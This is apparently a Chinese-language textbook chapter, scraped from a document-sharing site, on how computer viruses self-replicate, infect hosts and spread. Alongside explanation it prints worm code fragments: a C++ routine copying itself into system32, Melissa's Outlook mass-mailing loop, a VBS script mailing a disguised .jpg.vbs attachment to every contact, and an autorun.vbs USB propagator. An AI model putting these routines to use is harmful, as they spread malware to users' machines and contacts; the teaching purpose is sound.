版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
2计算机病毒的构造本章开始深入讲解病毒的机理构造,是重点内容主要包括:2.1计算机病毒的自我复制2.2计算机病毒的感染机制2.3计算机病毒的传播机制2.4计算机病毒的伪装及变种功能2.1计算机病毒的自我复制
自我复制是计算机病毒的最重要特征,要阐述清楚它为什么具有了自我复制的功能----信息的数字化和可存储是基本;不同病毒的自我复制实现不同.病毒的自我复制功能被绝大多数读者认为是病毒的最奇妙的技术。其实,信息的数字化和机器的拷贝功能是计算机病毒自我复制技术的基础,只不过复制不是由计算机用户操作完成,而是病毒本身来完成,下面将一一介绍。2.1计算机病毒的自我复制2.1.1生物病毒和计算机病毒的复制比较生物病毒的复制生物病毒是一种生物实体,它能够使用细胞所具有的机制和物质对自己进行再制造,离开宿主它不能存在。计算机病毒的复制作为计算机病毒一般具有一下两个特征:1.该段程序寄生于宿主程序中,宿主程序执行时,该段程序首先被执行。即具有寄生性。2.该段程序能够自我复制到其他宿主程序中,即具有传染性。且被感染的程序运行时,病毒程序能够进一步感染其他目标程序,从而使病毒得到传播。能够进行自我复制计算机病毒的执行过程可以这样描述:AtthebeginningisoneSRP--->/*PhaseI:INFECTIONProcess*/A:.~Searchinagivendirectoryiffile..If(fileisfound)then.If(fingerprintinfile)then.Changetonextentryindirectory.gotoA:.else.CopytheSRPcode:TheinfectedcodeofhostmuststartbytheSearchfunctionandamoveisneededtoavoidtooverwritingcode..Savepreinfectionentryofhost.endif.else.Changedirectory.gotoA:.endif/*Phase2:ACTIONProcess*/.If(trigger)thenACTIONprocess.endif.gotopreinfectionentryinhostprogram--->Now:anewSRP.--->Later...alotofSRP‘s.2.1.2计算机病毒自我复制示例
VC写的病毒自我传播的示例:voidCMeCopyDlg::OnMeCopy(){//只所以写这类程序希望大家能明白的是病毒怎么感染和自我传播的,我会把它的各个功能写出来..charsyspath[256]={0},pepath[256]={0};interrsys=::GetWindowsDirectoryA(syspath,255);//获取系统路径;interrpe=::GetCurrentDirectory(256,pepath);//获取当前路径;//---------------这里是没有获取到路径时的处理-----------/*...省略....*/charpath[256]={0};//------------------开始复制文件方法1-----------------------charcomm[256]={0};wsprintf(comm,"xcopy/c/r/y%s\\mecopy.exe%s\\system32\\mecopy.exe",pepath,syspath);//这里设定命令是不管什么只是复制...$_$...wsprintf(path,"系统路径:%s\n程序路径:%s\n拷贝命令:%s"m);MessageBox(path,"GetPath:");//system(comm);//这种复制是用DOS复制的,回有个DOS闪烁一下!回被发现哦...//另外一种复制方法:charpath1[256]={0};charpath2[256]={0};wsprintf(path2,"%s\\system32\\mecopy.exe",syspath);wsprintf(path1,"%s\\mecopy.exe",pepath);intcpyerr=CopyFile(path1,path2,1);if(cpyerr==0){MessageBox("CopyFileError!!");}}2.1.2计算机病毒自我复制示Melissa病毒的自我复制部分的代码片段如下:IfUngaDasOutlook=“Outlook”ThenDasMapiName.Logon“profile”,”password” Fory=1ToDasMapiName.AddressLists.Count SetAddyBook=DasMapiName.AddressLists(y) x=1 SetBreakUmOffASlice=UngaDasOutlook.CreateItem(0) Foroo=1ToAddyBook.AddressEntries.Count Peep=AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.AddPeep x=x+1 Ifx>50Thenoo=AddyBook.AddressEntries.Count Nextoo BreakUmOffASlice.Subject=“ImportrantMessageFrom”&Application.UserName BreakUmOffASlice.Body=“Hereisthatdocumentyouaskedfor...don’tshowanyoneelse;-)” BreakUmOffASlice.Attachments.AddActiveDocument.FullName BreakUmOffASlice.Send Peep=“” NextyDasMapiName.LogoffEndIf2.1.3病毒自我复制的结构和模型
Cohen在1984年为计算机病毒提出了一个形式化的数学模型,这个模型使用图灵机。实际上Cohen的计算机病毒的形式化数学模型与Neumann的自我复制细胞自动机是十分像似的。从Neumann的角度,我们可以说计算机病毒就是一个可以自我复制的细胞自动机。病毒的自我复制结构程下面的金字塔型结构:2.1.3病毒自我复制的结构和模型图2.1病毒自我复制功能的金字塔型结构2.1.4基于自我复制功能的检测
病毒的自我复制的结构和描述有些类似于句子的生成,这是病毒的最根本的一个特征,即使其他的特征不明显,依据自我复制的特征就可以判别是否为病毒,因此本节介绍自我复制在病毒检测中方法和依据,详细而系统的病毒检测将在防治篇中介绍。病毒自我复制功能的检测类似文本的自动生成理论。前面对自我复制功能的描述就是一个有穷自动机的形式。2.1.4基于自我复制功能的检测在自我复制功能的检测过程中,所有的系统调用都被监视器截获,然后被发往复制检测模块,在这里包含了一整套不同的检测和过滤机制。图4.3.一场动作的检测算法2.2计算机病毒的感染机制
2.2.1计算机病毒感染机制的概述2.2.2计算机病毒的目的及实现2.2.3计算机病毒的传染方式2.2.4一个典型病毒的源码(感染部分)剖析2.2.5总结2.2.1计算机病毒感染机制的概述
大多数的病毒都会用如下的一段伪代码来检查某目标是否已被感染(复合的感染是相当明显的)。BEGINIF(infectable_object_found)AND(object_not_already_infected)THEN(infect_object)END下一步就是将病毒代码安装到可被感染的目标中,这可能需要一步或更多的操作来实现,其数目取决于病毒的类型。病毒代码安装的方式有:在引导区中写入一段新代码。将该代码附加于某个程序文件。将宏代码附加于.doc文档。将代码附加于标准系统程序,截断网络服务以便将与受感染文件相连的链接发送到被俘获的email地址中去。2.2.2计算机病毒的目的及实现
那么病毒在什么情况下被首次执行呢?①染有引导型病毒的磁盘在启动计算机时(无论该磁盘是否是真正的DOS引导盘,是否真正将计算机启动成功),病毒被执行。②文件型病毒在执行染毒EXE和COM文件时被执行。③初始化批处理启动病毒。④混合型病毒在以上几种情况下都被执行。2.2.3计算机病毒的传染方式
引导型感染:引导型病毒的代表有:Brain病毒,Stoned病毒等。寄生感染:病毒将其代码放入宿主程序中,或者在头部或者在尾部亦或者在中部。滋生感染:滋生感染式病毒又名伴侣病毒。破坏性感染:1990年9月产于原西德的Numberone病毒,1991年12月产于加拿大的small38病毒就属于此类。混合感染:既感染文件又感染主引导扇区或Boot扇区的混合感染病毒。交叉感染:2.2.4一个典型感染剖析
“求职信”病毒是最早出现于2001年年底,相继出现了多个变种,专门攻击微软公司Outlook及OutlookExpress的弱点。由于此病毒多以求职为邮件内容,所以很容易迷惑用户,用户只要打开(甚至是预览)带有这种病毒的电子邮件,就能够导致病毒的发作。当病毒驻留系统后可能会强行关闭用户正在进行的正常操作,甚至会删除硬盘上的14种文档。“求职信”病毒程序具有双程序结构,分为蠕虫部分(网络传播)和病毒部分(感染文件,破坏文件)。2.2.4一个典型感染剖析
当“求职信”病毒被激活后(用户打开或预览了带病毒的邮件),将按下列步骤对系统进行破坏。1.安装木马2.修改注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceWink***=wink***.exe3.中止反病毒程序ACKWIN32,ALERTSVC,AMON,ANTIVIR,……,NOD32,Norton,……等51个程序4.繁殖病毒将自身复制到本地硬盘、网络映射盘和局域网的共享硬盘上,复制的文件都具有双重扩展名,一般如下:第一个后缀为:BAK、BAT、C、CPP、DOC、EXE、HTM、HTML、MP3、MP8、MPEG、MPQ、5.传播经搜索到的邮件地址发送带病毒的电子邮件,发送的带毒附件的文件名格式和复制的文件名格式是一样的。6.修改可执行文件2.2.5总结随着互联网的日益发展,计算机病毒的危害越来越大,计算机病毒的感染方式也愈来愈多。但病毒的最根本还是自我复制。在整个生命期中还采用了隐藏、加密、触发条件的手法,等等。本人对计算机病毒感染机制进行了叙述,但不尽详略。随着计算机病毒的防治愈加重要,对计算机病毒感染机制的研究也将更深入和广泛。2.3计算机病毒的传播机制
2.3.1计算机病毒的传播方式2.3.2计算机病毒传播原理2.3.3典型网络病毒传播源码分析2.3.4通过移动存储介质传播的原理2.3.1计算机病毒的传播方式
通过网络传播1通过网络的浏览和下载传播2通过电子邮件等传播3通过即时通讯软件传播4通过局域网传播5通过网页或软件等的漏洞进行传播通过移动存储介质传播其它传播方式2.3各种传播途径比例2.3.2计算机病毒传播原理1蠕虫的目标定位①收集电子邮件地址②进行网络共享枚举攻击。③网络扫描和目标指纹攻击。网络蠕虫能够扫描远程系统,他们使用预定义的网络地址类(指IP地址类)表产生随机的IP地址;随机扫描:蠕虫W32/Slammer。Slammer攻击UDP的1434(SQLserver)端口,它不检测IP地址是否有效。2.3.2计算机病毒传播原理
2感染传播①攻击安装了后门的系统。有些蠕虫使用使用其它蠕虫留下的后门接口进行传播,如W32/Borm,它感染安装了BackOrifice的系统。具体攻击过程如下:Ⅰ)随机产生一个IP地址,并用BackOrifice的BO_PING参查看是否安装有后门;Ⅱ)Borm向服务器发送一个BO_HTTP_ENABLE命令,指示BackOrifice在系统上使用TCP协议的12345端口建立HTTP代理服务。Ⅲ)蠕虫连接服务器,用MIME编码上传自己,蠕虫通过BO_PROCESS_SPAWN命令在服务器上运行刚刚上传的可执行程序,进行新的传播。2.3.3典型网络病毒传播源码分析
1蠕虫病毒Worm.Japanize的传播实例2.3.3典型网络病毒传播源码分析2vbs脚本病毒通过网络传播的几种方式及代码分析FunctionmailBroadcast()SetmapiObj=outlookApp.GetNameSpace("MAPI")//获取MAPI的名字空间……ForEachaddrInaddrList//获取每个地址表的Email记录数ForaddrEntIndex=1ToaddrEntCount//遍历地址表的Email地址Setitem=outlookApp.CreateItem(0)//获取一个邮件对象实例SetaddrEnt=addr.AddressEntries(addrEntIndex)//获取具体Email地址item.To=addrEnt.Address//填入收信人地址…..SetattachMents=item.Attachments//定义邮件附件attachMents.AddfileSysObj.GetSpecialFolder(0)&"\test.jpg.vbs"item.DeleteAfterSubmit=True//信件提交后自动删除Ifitem.To<>""Thenitem.Send//发送邮件shellObj.regwrite"HKCU\software\Mailtest\mailed","1"//病毒标记,以免重复感染2.3.4通过移动存储介质传播的原理
1主动传播病毒从带毒载体进入内存,一般是利用操作系统的加载机制或引导机制。病毒从内存侵入无毒介质,则利用操作系统的读写磁盘中断向量入口地址或修改加载机制(例如INT13H或INT21H),使该中断向量指向病毒程序感染模块。内存中的病毒时刻监视着操作系统的每一个操作,这样,一旦系统执行磁盘读写操作或系统功能调用,病毒感染模块就会被激活,感染模块在判断感染条件满足的条件下,把病毒自身感染给被读写的磁盘或被加载的程序,病毒被按照病毒的磁盘储存结构存放在磁盘上,然后再转移到原中断服务程序执行原有的操作。大部分此类的Windows病毒要正确运行,则必须调用API或系统服务。此类计算机病毒感染的一般过程有:①当宿主程序运行时,截取控制权;②寻找感染的突破口;③将病毒代码故人宿主程序。Autorun主动传播事例autorun.vbs:onerrorresumenextSetWshShell=CreateObject("WScript.Shell")if1=0thenelseFori=1to1setOf=CreateObject("Scripting.FileSystemObject")setdir=Of.GetSpecialFolder(1)Setdc=Of.DrivesifWScript.ScriptFullName=dir&"\autorun.vbs"thenisdir=trueelsea=WshShell.Run("autorun.batOpen",0,False)isdir=falseendifForEachdIndcIfd.DriveType=2Ord.DriveType=3or(d.DriveType=1andd<>"A:"andd<>"B:")Thena=WshShell.Run("autorun.bat-"&d,0,True)ifisdirthenOf.CopyFiledir&"\autorun.bat",d&"\",TrueOf.CopyFiledir&"\sxs.exe",d&"\",TrueOf.CopyFiledir&"\autorun.inf",d&"\",TrueOf.CopyFiledir&"\autorun.reg",d&"\",TrueOf.CopyFiledir&"\autorun.vbs",d&"\",TrueelseOf.CopyFile"autorun.bat",d&"\",TrueAutorun传播事例Of.CopyFile"sxs.exe",d&"\",TrueOf.CopyFile"autorun.inf",d&"\",TrueOf.CopyFile"autorun.reg",d&"\",TrueOf.CopyFile"autorun.vbs",d&"\",Trueendifa=WshShell.Run("autorun.bat+"&d,0,True)EndIfnextifisdirthenwscript.sleep60000i=0elsea=WshShell.Run("autorun.bat-"&dir,0,True)Of.CopyFile"autorun.bat",dir&"\",TrueOf.CopyFile"sxs.exe",dir&"\",TrueOf.CopyFile"autorun.inf",dir&"\",TrueOf.CopyFile"autorun.reg",dir&"\",TrueOf.CopyFile"autorun.vbs",dir&"\",Truea=WshShell.Run("autorun.bat+"&dir,0,True)EndifnextEndif2.3.4通过移动存储介质传播的原理2被动传播用户在进行拷贝磁盘或文件时,把一个病毒由一个载体复制到另外一个载体上。或者执行一个染毒的程序时,导致病毒运行而感染。有时病毒会使用一种巧妙的方式诱骗用户执行病毒,病毒把U盘下所有文件夹隐藏,并把自己复制成与原文件夹名称相同的具有文件夹图标的文件,当你点击时病毒会执行自身并且打开隐藏的该名称的文件夹。2.3.5总结
病毒的传播方式是多种多样的,同一种病毒可能有多种传播方式。病毒的传播技术是随着计算机技术的发展而发展。在本节中,简单地讨论了计算机病毒利用网络及移动存储介质的传播原理,着重分析了网络环境下的病毒传播,列出了常用的传播技术。2.4病毒的伪装及变种机制2.4.1
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 预算编制的常见问题解析计划
- 信阳师范大学《数据库原理及应用实验》2021-2022学年第一学期期末试卷
- 资金归集合同三篇
- 新余学院《基础英语》2021-2022学年第一学期期末试卷
- 西南医科大学《环境卫生学》2023-2024学年第一学期期末试卷
- 西南林业大学《设计材料与加工工艺实验》2022-2023学年第一学期期末试卷
- 幼儿园老师班级管理培训
- 《资产评估》第七章案例分析题
- 课件预防和减少青少年犯罪
- 西华大学《传统造物与创新方法》2022-2023学年第一学期期末试卷
- 皮肤保湿霜化妆品市场发展预测和趋势分析
- 期末(试题)-2024-2025学年人教PEP版英语六年级上册
- 2024安全生产标准化管理体系新旧版本对比版
- 口腔科消毒隔离知识培训
- 企业新闻宣传培训
- GB/T 3488.1-2024硬质合金显微组织的金相测定第1部分:金相照片和描述
- 第六单元 百分数(单元测试)(含答案)-2024-2025学年六年级上册数学苏教版
- 盐城工学院《数据结构》2022-2023学年期末试卷
- 补偿油缸维修方案
- 国家公务员考试(面试)试题及解答参考(2024年)
- 商业综合体停车场管理方案
评论
0/150
提交评论